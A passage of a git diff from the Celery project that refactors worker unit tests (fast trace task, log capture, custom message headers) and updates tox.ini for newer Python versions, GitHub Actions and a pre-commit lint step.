self.mytask.name, tid, message.headers,
message.body, message.content_type,
message.content_encoding, app=self.app,
@@ -1007,6 +1095,23 @@ def test_execute_using_pool(self):
p = Mock()
job.execute_using_pool(p)
p.apply_async.assert_called_once()
+ trace = p.apply_async.call_args[0][0]
+ assert trace == trace_task_ret
+ args = p.apply_async.call_args[1]['args']
+ assert args[0] == self.mytask.name
+ assert args[1] == tid
+ assert args[2] == job.request_dict
+ assert args[3] == job.message.body
+
+ def test_execute_using_pool_fast_trace_task(self):
+ self.app.use_fast_trace_task = True
+ tid = uuid()
+ job = self.xRequest(id=tid, args=[4])
+ p = Mock()
+ job.execute_using_pool(p)
+ p.apply_async.assert_called_once()
+ trace = p.apply_async.call_args[0][0]
+ assert trace == fast_trace_task
args = p.apply_async.call_args[1]['args']
assert args[0] == self.mytask.name
assert args[1] == tid
@@ -1075,11 +1180,12 @@ def setup(self):
self.task = Mock(name='task')
self.pool = Mock(name='pool')
self.eventer = Mock(name='eventer')
- RequestCase.setup(self)
+ super().setup()
def create_request_cls(self, **kwargs):
return create_request_cls(
- Request, self.task, self.pool, 'foo', self.eventer, **kwargs
+ Request, self.task, self.pool, 'foo', self.eventer, app=self.app,
+ **kwargs
)
def zRequest(self, Request=None, revoked_tasks=None, ref=None, **kwargs):
@@ -1158,12 +1264,32 @@ def test_execute_using_pool__expired(self):
job.execute_using_pool(self.pool)
def test_execute_using_pool(self):
- from celery.app.trace import trace_task_ret as trace
weakref_ref = Mock(name='weakref.ref')
job = self.zRequest(id=uuid(), revoked_tasks=set(), ref=weakref_ref)
job.execute_using_pool(self.pool)
self.pool.apply_async.assert_called_with(
- trace,
+ trace_task_ret,
+ args=(job.type, job.id, job.request_dict, job.body,
+ job.content_type, job.content_encoding),
+ accept_callback=job.on_accepted,
+ timeout_callback=job.on_timeout,
+ callback=job.on_success,
+ error_callback=job.on_failure,
+ soft_timeout=self.task.soft_time_limit,
+ timeout=self.task.time_limit,
+ correlation_id=job.id,
+ )
+ assert job._apply_result
+ weakref_ref.assert_called_with(self.pool.apply_async())
+ assert job._apply_result is weakref_ref()
+
+ def test_execute_using_pool_with_use_fast_trace_task(self):
+ self.app.use_fast_trace_task = True
+ weakref_ref = Mock(name='weakref.ref')
+ job = self.zRequest(id=uuid(), revoked_tasks=set(), ref=weakref_ref)
+ job.execute_using_pool(self.pool)
+ self.pool.apply_async.assert_called_with(
+ fast_trace_task,
args=(job.type, job.id, job.request_dict, job.body,
job.content_type, job.content_encoding),
accept_callback=job.on_accepted,
@@ -1179,7 +1305,6 @@ def test_execute_using_pool(self):
assert job._apply_result is weakref_ref()
def test_execute_using_pool_with_none_timelimit_header(self):
- from celery.app.trace import trace_task_ret as trace
weakref_ref = Mock(name='weakref.ref')
job = self.zRequest(id=uuid(),
revoked_tasks=set(),
@@ -1187,7 +1312,7 @@ def test_execute_using_pool_with_none_timelimit_header(self):
headers={'timelimit': None})
job.execute_using_pool(self.pool)
self.pool.apply_async.assert_called_with(
- trace,
+ trace_task_ret,
args=(job.type, job.id, job.request_dict, job.body,
job.content_type, job.content_encoding),
accept_callback=job.on_accepted,
@@ -1204,8 +1329,9 @@ def test_execute_using_pool_with_none_timelimit_header(self):
def test_execute_using_pool__defaults_of_hybrid_to_proto2(self):
weakref_ref = Mock(name='weakref.ref')
- headers = strategy.hybrid_to_proto2('', {'id': uuid(),
- 'task': self.mytask.name})[1]
+ headers = strategy.hybrid_to_proto2(Mock(headers=None), {'id': uuid(),
+ 'task': self.mytask.name})[
+ 1]
job = self.zRequest(revoked_tasks=set(), ref=weakref_ref, **headers)
job.execute_using_pool(self.pool)
assert job._apply_result
diff --git a/t/unit/worker/test_strategy.py b/t/unit/worker/test_strategy.py
index 6b93dab74d9..8d7098954af 100644
--- a/t/unit/worker/test_strategy.py
+++ b/t/unit/worker/test_strategy.py
@@ -1,3 +1,4 @@
+import logging
from collections import defaultdict
from contextlib import contextmanager
from unittest.mock import ANY, Mock, patch
@@ -6,6 +7,7 @@
from kombu.utils.limits import TokenBucket
from celery import Task, signals
+from celery.app.trace import LOG_RECEIVED
from celery.exceptions import InvalidTaskError
from celery.utils.time import rate
from celery.worker import state
@@ -142,12 +144,14 @@ def _context(self, sig,
message = self.prepare_message(message)
yield self.Context(sig, s, reserved, consumer, message)
- def test_when_logging_disabled(self):
+ def test_when_logging_disabled(self, caplog):
+ # Capture logs at any level above `NOTSET`
+ caplog.set_level(logging.NOTSET + 1, logger="celery.worker.strategy")
with patch('celery.worker.strategy.logger') as logger:
logger.isEnabledFor.return_value = False
with self._context(self.add.s(2, 2)) as C:
C()
- logger.info.assert_not_called()
+ assert not caplog.records
def test_task_strategy(self):
with self._context(self.add.s(2, 2)) as C:
@@ -165,6 +169,33 @@ def test_callbacks(self):
for callback in callbacks:
callback.assert_called_with(req)
+ def test_log_task_received(self, caplog):
+ caplog.set_level(logging.INFO, logger="celery.worker.strategy")
+ with self._context(self.add.s(2, 2)) as C:
+ C()
+ for record in caplog.records:
+ if record.msg == LOG_RECEIVED:
+ assert record.levelno == logging.INFO
+ break
+ else:
+ raise ValueError("Expected message not in captured log records")
+
+ def test_log_task_received_custom(self, caplog):
+ caplog.set_level(logging.INFO, logger="celery.worker.strategy")
+ custom_fmt = "CUSTOM MESSAGE"
+ with self._context(
+ self.add.s(2, 2)
+ ) as C, patch(
+ "celery.app.trace.LOG_RECEIVED", new=custom_fmt,
+ ):
+ C()
+ for record in caplog.records:
+ if record.msg == custom_fmt:
+ assert set(record.args) == {"id", "name", "kwargs", "args"}
+ break
+ else:
+ raise ValueError("Expected message not in captured log records")
+
def test_signal_task_received(self):
callback = Mock()
with self._context(self.add.s(2, 2)) as C:
@@ -247,7 +278,7 @@ def test_custom_request_gets_instantiated(self):
class MyRequest(Request):
def __init__(self, *args, **kwargs):
- Request.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
_MyRequest()
class MyTask(Task):
@@ -271,7 +302,7 @@ def failed():
class test_hybrid_to_proto2:
def setup(self):
- self.message = Mock(name='message')
+ self.message = Mock(name='message', headers={"custom": "header"})
self.body = {
'args': (1,),
'kwargs': {'foo': 'baz'},
@@ -288,3 +319,7 @@ def test_retries_custom_value(self):
self.body['retries'] = _custom_value
_, headers, _, _ = hybrid_to_proto2(self.message, self.body)
assert headers.get('retries') == _custom_value
+
+ def test_custom_headers(self):
+ _, headers, _, _ = hybrid_to_proto2(self.message, self.body)
+ assert headers.get("custom") == "header"
diff --git a/t/unit/worker/test_worker.py b/t/unit/worker/test_worker.py
index aedf852788f..c6733e97d1c 100644
--- a/t/unit/worker/test_worker.py
+++ b/t/unit/worker/test_worker.py
@@ -11,7 +11,6 @@
import pytest
from amqp import ChannelError
-from case import mock
from kombu import Connection
from kombu.asynchronous import get_event_loop
from kombu.common import QoS, ignore_errors
@@ -804,8 +803,8 @@ def test_with_autoscaler(self):
assert worker.autoscaler
@t.skip.if_win32
- @mock.sleepdeprived(module=autoscale)
- def test_with_autoscaler_file_descriptor_safety(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_with_autoscaler_file_descriptor_safety(self, sleepdeprived):
# Given: a test celery worker instance with auto scaling
worker = self.create_worker(
autoscale=[10, 5], use_eventloop=True,
@@ -853,8 +852,8 @@ def test_with_autoscaler_file_descriptor_safety(self):
worker.pool.terminate()
@t.skip.if_win32
- @mock.sleepdeprived(module=autoscale)
- def test_with_file_descriptor_safety(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_with_file_descriptor_safety(self, sleepdeprived):
# Given: a test celery worker instance
worker = self.create_worker(
autoscale=[10, 5], use_eventloop=True,
@@ -893,7 +892,7 @@ def throw_file_not_found_error(*args, **kwargs):
worker.pool._pool.on_poll_start()
# Then: test did not raise OSError
- # Given: a mock object that fakes whats required to do whats next
+ # Given: a mock object that fakes what's required to do what's next
proc = Mock(_sentinel_poll=42)
# When: Calling again to register with event loop ...
diff --git a/tox.ini b/tox.ini
index 1b12965923a..39cfcb5e198 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,35 +1,50 @@
[tox]
+requires =
+ tox-gh-actions
envlist =
- {3.6,3.7,3.8,3.9-dev,pypy3}-unit
- {3.6,3.7,3.8,3.9-dev,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
+ {3.7,3.8,3.9,3.10,pypy3}-unit
+ {3.7,3.8,3.9,3.10,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
flake8
apicheck
configcheck
bandit
+
+[gh-actions]
+python =
+ 3.7: 3.7-unit
+ 3.8: 3.8-unit
+ 3.9: 3.9-unit
+ 3.10: 3.10-unit
+ pypy-3: pypy3-unit
+
[testenv]
+sitepackages = False
+recreate = False
+passenv =
+ AZUREBLOCKBLOB_URL
+
deps=
-r{toxinidir}/requirements/default.txt
-r{toxinidir}/requirements/test.txt
-r{toxinidir}/requirements/pkgutils.txt
- 3.6,3.7,3.8,3.9-dev: -r{toxinidir}/requirements/test-ci-default.txt
- 3.5,3.6,3.7,3.8,3.9-dev: -r{toxinidir}/requirements/docs.txt
- 3.6,3.7,3.8,3.9-dev: -r{toxinidir}/requirements/docs.txt
- pypy3: -r{toxinidir}/requirements/test-ci-base.txt
+ 3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/test-ci-default.txt
+ 3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/docs.txt
+ pypy3: -r{toxinidir}/requirements/test-ci-default.txt
integration: -r{toxinidir}/requirements/test-integration.txt
linkcheck,apicheck,configcheck: -r{toxinidir}/requirements/docs.txt
- flake8: -r{toxinidir}/requirements/pkgutils.txt
+ lint: pre-commit
bandit: bandit
-sitepackages = False
-recreate = False
+
commands =
- unit: pytest -xv --cov=celery --cov-report=xml --cov-report term {posargs}
+ unit: pytest --maxfail=10 -v --cov=celery --cov-report=xml --cov-report term {posargs}
integration: pytest -xsv t/integration {posargs}
setenv =
+ PIP_EXTRA_INDEX_URL=https://celery.github.io/celery-wheelhouse/repo/simple/
BOTO_CONFIG = /dev/null
WORKER_LOGLEVEL = INFO
PYTHONIOENCODING = UTF-8
@@ -56,19 +71,17 @@ setenv =
azureblockblob: TEST_BROKER=redis://
azureblockblob: TEST_BACKEND=azureblockblob://DefaultEndpointsProtocol=http;AccountName=devstoreaccount1;AccountKey=Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw==;BlobEndpoint=http://127.0.0.1:10000/devstoreaccount1;
-passenv =
- TRAVIS
- AZUREBLOCKBLOB_URL
+
basepython =
- 3.6: python3.6
3.7: python3.7
3.8: python3.8
- 3.9-dev: python3.9
+ 3.9: python3.9
+ 3.10: python3.10
pypy3: pypy3
- flake8,apicheck,linkcheck,configcheck,bandit: python3.8
- flakeplus: python2.7
+ lint,apicheck,linkcheck,configcheck,bandit: python3.9
usedevelop = True
+
[testenv:apicheck]
setenv =
PYTHONHASHSEED = 100
@@ -87,6 +100,6 @@ commands =
commands =
bandit -b bandit.json -r celery/
-[testenv:flake8]
+[testenv:lint]
commands =
- flake8 -j 2 {toxinidir}
+ pre-commit {posargs:run --all-files --show-diff-on-failure}